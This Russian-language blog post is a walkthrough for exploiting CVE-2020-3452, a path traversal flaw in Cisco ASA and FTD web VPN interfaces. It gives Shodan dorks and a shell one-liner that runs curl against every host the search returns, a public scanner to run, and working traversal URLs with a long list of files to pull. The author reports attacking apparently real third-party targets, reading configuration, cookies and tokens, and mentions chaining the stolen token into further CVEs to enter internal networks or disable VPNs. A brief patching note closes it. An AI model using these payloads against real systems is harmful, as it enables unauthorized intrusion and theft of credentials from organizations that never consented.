Уязвимость CVE-2020-3452

#Обучение

Сегодня поговорим немного о нашумевшей уязвимости в Cisco

Оперативно искать решение проблемы IT-компании заставил Михаил Ключников.

Эксперт из Positive Technologies не впервые находит опасные уязвимости.

Данная уязвимость касается межсетевого экрана Cisco ASA.

И получив идентификатор CVE-2020-3452,она имеет высокий уровень опасности.

Если на устройстве проигнорирована проверка вводных данных,

то атакующий получает доступ к файловой системе и может читать файлы конфигурации WebVPN.

Компания Cisco срочно выпустила патч,но как всегда не все читают новости.

И по-традиции покажу как эксплуатируется такая уязвимость на реальном примере.

Для нахождения уязвимых целей воспользуемся поисковиком shodan.

Интерес представляют следующие версии:

Cisco ASA:9.7 ;9.8 ;9.9 ;9.10 ;9.12 ;9.13 ;9.14

Cisco FTD:6.2.2; 6.2.3 ;6.3.0 ;6.4.0 ;6.5.0 ;6.6.0

Запросы для поисковика:

+CSCOT+ ;+CSCOCA+ ;+CSCOL+ ;+CSCOU+ и +CSCOE+

Если имеется готовый api-key для shodan,то можно его вставить в этот скрипт.

И выполнить поиск из терминала:

# shodan search Cisco ASA --fields ip_str --separator " " | awk '{print $1}' | while read host do ; do curl -s -k  "https://$host/+CSCOT+/translation-tab..." ; done

Проверка на уязвимость CVE-2020-3452

Очень удобным оказался для этого сканер от PR3R00T из Англии.

Прилагается файл urls.txt ,который чистим и заполняем списком своих целей

Формат заполнения: https://IP-цели,либо https:// сайт и домен

Кто админит Cisco, могут также воспользоваться для проверки своих веб-интерфейсов сканером:

# git clone https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner.git
# cd CVE-2020-3452-Cisco-Scanner
# chmod +x scanner.py
# python3 scanner.py urls.txt

Вот нам сканер указывает на непропатченные машины.

Эксплуатация

Работать будем с Burpsuite,но может кому пригодиться и exploit

Вокальные данные у него неплохие,но рассчитан он на совместную работу в терминале с Nmap.

Впрочем,аналогично может обработать целый список хостов.

В Burpsuite используются в основном 2 вида POC для атаки Path Traversal :

https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

Запрос при атаке в дальнейшем меняется и вместо portal_inc.lua подставляется:

logo.gif

http_auth.html

user_dialog.html

localization_inc.lua

portal_inc.lua

include

nostcaccess.html

ask.html

no_svc.html

svc.html

session.js

useralert.html

ping.html

help

app_index.html

tlbr

portal_forms.js

logon_forms.js

win.js

portal.css

portal.js

sess_update.html

blank.html

noportal.html

portal_ce.html

portal.html

home

logon_custom.css

portal_custom.css

preview.html

session_expired

custom

portal_elements.html

commonspawn.js

common.js

appstart.js

appstatus

relaymonjar.html

relaymonocx.html

relayjar.html

relayocx.html

portal_img

color_picker.js

color_picker.html

cedhelp.html

cedmain.html

cedlogon.html

cedportal.html

cedsave.html

cedf.html

ced.html

lced.html

files

pluginlib.js

shshim

do_url

clear_cache

connection_failed_form

apcf

ucte_forbidden_data

ucte_forbidden_url

cookie

session_password.html

tunnel_linux.jnlp

tunnel_mac.jnlp

sdesktop

gp-gip.html

auth.html

wrong_url.html

logon_redirect.html

logout.html

logon.html

test_chargen

Таким образом,прочитываем файлы,в которых можно найти конфиденциальную информацию.

Здесь, к примеру, найдены cookie, token и прочее:

Token можно сразу же применить для раскрутки другой опасной уязвимости CVE-2020-3259

Она позволяет ввалиться во внутреннюю сеть атакуемой организации.

А если цель подвержена ещё и CVE-2020-3187,то можно отключить VPN.

Далеко так заходить конечно не станем.

У другой цели была обнаружена вот такая страница авторизации.

И результат атаки:

Здесь без комментариев:

Просматриваем useralert:

Объёмный файл,в котором конфигурация,описание авторизации и местонахождения файлов с паролями:

Объёмный файл,в котором конфигурация,описание авторизации и местонахождения файлов с паролями:

Защита

Защитное программное обеспечение от данной уязвимости с описанием здесь

Кроме этого,необходимо проверить конфигурацию с проверкой вводных данных.

Без кропотливой настройки веб-интерфейс может быть по-прежнему уязвим.

Тестируемые ресурсы живы и невридимы,им не причинено ущерба.

Благодарю всех за внимание и до новых встреч.

Источник